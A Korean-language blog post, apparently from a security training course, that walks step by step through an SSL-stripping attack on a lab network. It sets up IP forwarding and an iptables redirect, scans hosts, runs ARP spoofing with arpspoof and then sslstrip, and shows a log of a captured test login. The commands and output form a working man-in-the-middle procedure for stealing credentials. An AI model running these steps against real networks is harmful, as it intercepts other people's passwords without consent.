정보보안(구버전)/공격툴&정보수집 2016. 5. 26. 12:35

공격툴&정보수집 - 13. HTTPs 패스워드 크래킹

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

 - sslstrip : https(443) 연결 요청을 http(80)으로 강제로 변경하는 툴

 - 모든 HTTPs 해킹이 다 되는거는 아님

 

 

[참고] SSL

 

@ SSL(Secure Sockets Layer).txt

 

 

 

 

 

@ Kali Linux

 

 - sslstrip 툴 설치 유무 확인 및 설치

 

root@kali:~# dpkg -l | grep sslstrip
ii  sslstrip                               0.9-1kali3                           all          SSL/TLS man-in-the-middle attack tool


 

root@kali:~# apt-get install sslstrip
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다      
상태 정보를 읽는 중입니다... 완료
sslstrip 패키지는 이미 최신 버전입니다.
0개 업그레이드, 0개 새로 설치, 0개 제거 및 121개 업그레이드 안 함.

 

 

 - IP 포워딩 기능 활성화 및 PAT 설정 실시 (HTTP 80 -> 10000 리다이렉트 실시)
 

(터미널1)
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

 

 

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
root@kali:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination        
REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:http redir ports 10000

 

Chain INPUT (policy ACCEPT)
target     prot opt source               destination    

    

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination    

    

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination   

 

 

 - 공격 타겟 스켄 실시

 

root@kali:~# netdiscover -i eth1 -r 192.168.20.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                 
                                                                                               
 7 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 420                               
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.20.50   00:0c:29:d8:84:12    01    060   VMware, Inc.                                 
 192.168.20.100  00:0c:29:50:8a:5f    01    060   VMware, Inc.                                 
 192.168.20.100  00:0c:29:50:8a:69    01    060   VMware, Inc.                                 
 192.168.20.200  00:0c:29:72:28:7c    01    060   VMware, Inc.                                 
 192.168.20.201  00:0c:29:3e:92:78    01    060   VMware, Inc.                                 
 192.168.1.50    00:0c:29:d8:84:12    01    060   VMware, Inc.                                 
 192.168.1.254   00:50:56:fa:fc:1d    01    060   VMWare, Inc.  

(ctrl+c)


 

 - Window2008, Gateway 대상으로 ARP 스푸핑 실시


(터미널2)
root@kali:~# arpspoof -i eth1 -t 192.168.20.201 -r 192.168.20.100

~ 중간 생략 ~

 

 

 - sslstrip 툴 시작


(터미널1)
root@kali:~# sslstrip -l 10000

 

sslstrip 0.9 by Moxie Marlinspike running...

 


@ Window2008

 

 - Internet Explorer를 이용하여 'http://www.hotmail.com', 'http://www.apple.com' 접속 실시 및 로그인
 - 로그인 정보 (abcd@test.com/abcd1234)

 

 

@ Kali Linux

 

 - sslstrip 툴 동작 중지

 

root@kali:~# sslstrip -l 10000

 

sslstrip 0.9 by Moxie Marlinspike running...
(ctrl+c)

 

 

 - sslstrip.log 확인


root@kali:~# cat sslstrip.log
2016-05-26 13:04:25,781 SECURE POST Data (login.live.com):
loginfmt=abcd@test.com&login=abcd@test.com&passwd=abcd1234&type=11&PPFT=De8PnoZdlop74KcE8nGG*ypS5t6upeX9zLohm5mhYl%21*lEkYvn4k2Wt%21yLX7nauWCcyN9i0hHB9VbdSGPFcRvSr0maI*VzOAF6rAsVduLA898PyIOyyNV6tzVPJLIFZt*v28iL0c93NjunNX80COjFg8VzXs*7vTh05UHwxCq69vPNxnmXt6HZWqa85YpRVyCiHcZxd8p7DaNsPcru9RMI0s0QVVueI4NudUZoZyN38IAeFTO7DzX4oQhnY98B*pGA%24%24&PPSX=Pas&NewUser=1&LoginOptions=3&FoundMSAs=&fspost=0&i2=1&i16=&i17=0&i18=__DefaultLogin_Strings%7C1%2C__DefaultLogin_Core%7C1%2C&i19=&i21=0&i22=0&i13=0

 

 - ARP 스푸핑 해지

 

(터미널2)
root@kali:~# arpspoof -i eth1 -t 192.168.20.201 -r 192.168.20.100

~ 중간 생략 ~

 

(ctrl+c)

 

 

 - iptables 추가 설정 삭제

 

root@kali:~# iptables -t nat -F PREROUTING



[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


공격툴&정보수집 - 제13장 HTTPs 패스워드 크래킹 (sslstrip)   https://youtu.be/17C4fZzUOV8

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q